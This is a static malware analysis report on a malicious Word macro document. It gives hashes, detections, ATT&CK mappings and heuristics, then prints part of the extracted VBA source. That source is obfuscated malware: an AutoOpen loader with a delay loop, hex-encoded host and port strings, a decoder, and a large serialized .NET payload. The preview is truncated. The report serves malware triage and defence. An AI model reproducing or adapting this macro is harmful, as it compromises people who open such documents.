Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 23d520606c547054…

MALICIOUS

Office (OOXML)

39.7 KB Created: 2021-08-30 11:11:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-09-16
MD5: be9cd11cf7f12adc9018284c866b2d09 SHA-1: ea23df524f928e469f786a95c849e31fadce4fb8 SHA-256: 23d520606c54705461a71f1c3eb24d80f99949ba072d4728af3967cbc30c7683
324 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample contains an obfuscated VBA macro with an AutoOpen subroutine, which is designed to execute automatically when the document is opened. The macro attempts to construct a URL using hex-encoded strings and then likely downloads and executes a payload. The presence of 'CreateObject' and 'Shell' functions, along with the obfuscated nature, strongly suggests a downloader or droppper functionality.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6923224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923224-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 48493 bytes
SHA-256: 1319cf7ea84f35ab81d9754e530df964a731879d2eacbcc8345e139fa79eef7f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 133 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public kmgfsduo As String
Public chbwnbwlnulvzyxkyybj As String
Sub AutoOpen()
For I = 1 To 2147483644
    For J = 1 To 2147483644
        For K = 1 To 2147483644
            For L = 1 To 2147483644
                Next L
            Next K
    Next J
Next I
kmgfsduo = tjlxxlremdcm("3130") & tjlxxlremdcm("2e33302e3230382e3130")
chbwnbwlnulvzyxkyybj = tjlxxlremdcm("343433")
aakzcsnlvapk
End Sub
Private Function bymrwjyuv(hex)
On Error Resume Next
Dim jfeymfmkdyxpmoiqjdgh, enlrdftkltgdmfngctbn
Set jfeymfmkdyxpmoiqjdgh = CreateObject(tjlxxlremdcm("4d6963726f736f66742e584d4c") & tjlxxlremdcm("444f4d"))
Set enlrdftkltgdmfngctbn = jfeymfmkdyxpmoiqjdgh.createElement(tjlxxlremdcm("746d70"))
enlrdftkltgdmfngctbn.DataType = tjlxxlremdcm("6269") & tjlxxlremdcm("6e2e686578")
enlrdftkltgdmfngctbn.Text = hex
bymrwjyuv = enlrdftkltgdmfngctbn.NodeTypedValue
End Function
Private Function aakzcsnlvapk()
Dim serialized_obj
serialized_obj = tjlxxlremdcm("303030313030303030304646464646464646303130303030303030303030303030303034303130303030303032323533373937333734363536") & tjlxxlremdcm("44324534343635364336353637363137343635353336353732363936313643363937413631373436393646")
serialized_obj = serialized_obj & tjlxxlremdcm("3645343836463643363436353732303330303030303030383434363536433635363736313734363530") & tjlxxlremdcm("3737343631373236373635373433303037364436353734363836463634333030333033303333303533373937333734363536443245343436353643")
serialized_obj = serialized_obj & tjlxxlremdcm("3635363736313734363535333635373236393631364336393741363137343639364636453438") & tjlxxlremdcm("3646364336343635373232423434363536433635363736313734363534353645373437323739323235333739373337343635364432453434363536433635")
serialized_obj = serialized_obj & tjlxxlremdcm("3637363137343635353336353732363936313643363937413631373436393646364534383646364336343635373232463533373937") & tjlxxlremdcm("3337343635364432453532363536363643363536333734363936463645324534443635364436323635373234393645")
serialized_obj = serialized_obj & tjlxxlremdcm("363636463533363537323639363136433639374136313734363936463645343836463643363436353732303930323030303030303039303330303030303030") & tjlxxlremdcm("39303430303030303030343032303030303030333035333739373337343635364432453434")
serialized_obj = serialized_obj & tjlxxlremdcm("36353643363536373631373436353533363537323639363136433639") & tjlxxlremdcm("374136313734363936463645343836463643363436353732324234343635364336353637363137343635343536453734373237393037303030303030303437343739373036353038")
serialized_obj = serialized_obj & tjlxxlremdcm("3631373337333635364436323643373930363734363137323637363537343132373436313732363736353734353437393730363534313733373336353644363236433739") & tjlxxlremdcm("3045373436313732363736353734353437393730363534453631364436353041")
serialized_obj = serialized_obj & tjlxxlremdcm("3644363537343638364636343445363136443635304436343635364336353637363137343635343536453734373237393031303130323031") & tjlxxlremdcm("3031303130333330353337393733373436353644324534343635364336353637363137343635353336353732")
serialized_obj = serialized_obj & tjlxxlremdcm("363936313643") & tjlxxlremdcm("36393741363137343639364636453438364636433634363537323242343436353643363536373631373436353435364537343732373930363035303030303030324635333739373337343635364432453532373536453734363936443635")
serialized_obj = serialized_obj & tjlxxlremdcm("3245353236353644364637343639") & tjlxxlremdcm("3645363732453444363537333733363136373639364536373245343836353631363436353732343836313645363436433635373230363036303030303030344236443733363336463732364336393632324332303536")
serialized_obj = serialized_obj & tjlxxlremdcm("3635373237333639364636453344333232453330324533") & tjlxxlremdcm("3032453330324332303433373536433734373537323635334436453635373
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 71680 bytes
SHA-256: dc4431aa791a0127b55608654832755f7ae1d72a3379cc7b0f5aacb4036d84fd
Detection
ClamAV: Doc.Malware.Valyria-6923224-0
Obfuscation or payload: likely
Carved artifact contains 133 long base64-like blob(s).